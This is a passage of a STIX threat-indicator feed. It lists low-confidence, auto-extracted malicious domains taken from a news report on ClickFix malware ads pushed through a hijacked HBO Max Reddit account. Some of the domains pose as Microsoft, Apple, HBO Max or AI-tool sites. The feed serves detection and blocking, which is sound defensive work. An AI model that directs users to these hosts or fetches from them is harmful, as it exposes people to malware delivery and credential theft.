clean-disk-guide[.]com Copied-command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain","pattern":"[domain-name:value = 'flutelikelurkerunsinewy.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3dd0a3bf-60e0-4c78-bf6b-c5922586317e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gatemaden.space","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ntal[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and","pattern":"[domain-name:value = 'gatemaden.space']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e367548-4ca4-416d-aa45-72705f1acc35","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: getnova.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-la","pattern":"[domain-name:value = 'getnova.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--08f1f7cb-32c6-469d-ada6-0b5dc6c5ff4d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gigappyworld.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales","pattern":"[domain-name:value = 'gigappyworld.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8f63aa28-3538-4c2a-90c2-c2e2af903111","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: glowmedaesthetics.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]","pattern":"[domain-name:value = 'glowmedaesthetics.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a442580-3d7d-4aec-be76-c11ea1a19dfe","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: glrack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com","pattern":"[domain-name:value = 'glrack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4e8082c-ca98-4b69-865d-744e52680923","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gogolfonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: kestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]co","pattern":"[domain-name:value = 'gogolfonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0f5d08dc-3fe2-4ae9-918c-8c0d80c04a05","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: grove-12.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com","pattern":"[domain-name:value = 'grove-12.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0551424-096b-4982-bb69-25866dbfb7db","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: habar55.namebright.bike","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: akenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli","pattern":"[domain-name:value = 'habar55.namebright.bike']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--58dd3f33-f980-4452-a8d7-b19adb653245","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: harbor-29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; vers","pattern":"[domain-name:value = 'harbor-29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65822e1c-1f76-4fa5-94c2-312e29bac47f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account gave the actors a trusted advert","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e3c6d9a-0d55-4179-b251-47c2d0a5dad7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.app","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: blocked. Ads included 40 streaming-themed placements using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--308d2bc8-5c04-439b-aff8-32890c9273e7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rs run attacker code. The fraudulent landing page hosted at hbomaxx[.]us (Source – HudsonRock) The operators moved quickly as doma","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c283fda7-ac7d-45de-9e5b-36b4bb0b49f4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbubagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: arbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com;","pattern":"[domain-name:value = 'hbubagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f7172493-e1b4-4379-9944-e4da683bcd83","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: heroestales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]co","pattern":"[domain-name:value = 'heroestales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--41bc3e7b-0b33-4149-a797-fba6bec21dbc","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: homebrwmac-hub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: adesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-command lure domains Domai","pattern":"[domain-name:value = 'homebrwmac-hub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6225836a-675a-4f4c-9838-5bc1fd976cb4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: houstongaragedoorinstallers.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com September macOS telemetry and delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; ai","pattern":"[domain-name:value = 'houstongaragedoorinstallers.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9530b541-04bf-458c-a260-4f59aa6a937e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lakhov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: me[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and","pattern":"[domain-name:value = 'lakhov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--314c4574-3d93-4987-9072-98f2c54d6bc2","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lalandscapelighting.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ustongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia","pattern":"[domain-name:value = 'lalandscapelighting.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6669b0bd-272e-4e4f-8539-5f7f088a871b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: leaf68.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: trefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; p","pattern":"[domain-name:value = 'leaf68.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--532bf158-718d-44c6-a972-2eabab292437","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: loop-lumen.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains","pattern":"[domain-name:value = 'loop-lumen.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f6456661-b013-4024-b7dc-cf42b6f9896c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: macdeveloperhub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: s-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com;","pattern":"[domain-name:value = 'macdeveloperhub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1abe64fa-fb0d-49e6-9763-bcca49732be0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: macfixguide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rec","pattern":"[domain-name:value = 'macfixguide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8490175f-329f-4841-9b0d-4e74771b2a87","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: macstoragetips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: va-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage","pattern":"[domain-name:value = 'macstoragetips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80379d5c-e73a-4ea0-9cde-723567c44d8f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: marbellaresales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com Ma","pattern":"[domain-name:value = 'marbellaresales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea315852-419d-4b97-95de-655852d62543","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: microsoftupdater.info","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: page[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]","pattern":"[domain-name:value = 'microsoftupdater.info']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8405db0-0bbc-4110-82d6-a00579f8a706","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mpasvw.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domai","pattern":"[domain-name:value = 'mpasvw.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3df8cb38-e6ce-4bc2-bced-f995d212ec45","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: muse-code-ide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; cl","pattern":"[domain-name:value = 'muse-code-ide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2b5ce15-f880-42ff-a42c-5ae245b839a6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: node-slate.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]c","pattern":"[domain-name:value = 'node-slate.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da654517-ede0-415b-9d30-a2306d71ee2a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nova-desk.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-to","pattern":"[domain-name:value = 'nova-desk.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a06b4244-5bd6-43ec-b0e1-6b59d579930a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nova-fix.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novas","pattern":"[domain-name:value = 'nova-fix.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2e6d5f5c-1203-433d-a093-523d4b314da8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nova-hub.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: diag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com;","pattern":"[domain-name:value = 'nova-hub.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--68f48464-7b8c-4797-a226-7f780616c762","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nova-labs.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.","pattern":"[domain-name:value = 'nova-labs.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--392d6832-33ad-4a4e-abde-0f035dbb64c3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: novastacktips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: x[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning","pattern":"[domain-name:value = 'novastacktips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ac0f8b43-2d60-4388-8e47-323c25d04647","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nova-tools.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: esk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstorageti","pattern":"[domain-name:value = 'nova-tools.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1ac3aea-fc4e-41df-a83a-719cc19e1ce7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oakenfjrod.ru","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]na","pattern":"[domain-name:value = 'oakenfjrod.ru']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2a2d7ca-f1d5-4516-b77d-48e343ba9230","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: opendisplay.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com;","pattern":"[domain-name:value = 'opendisplay.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2b2c5678-e3d2-4e9b-8e44-1dc097afa7b9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 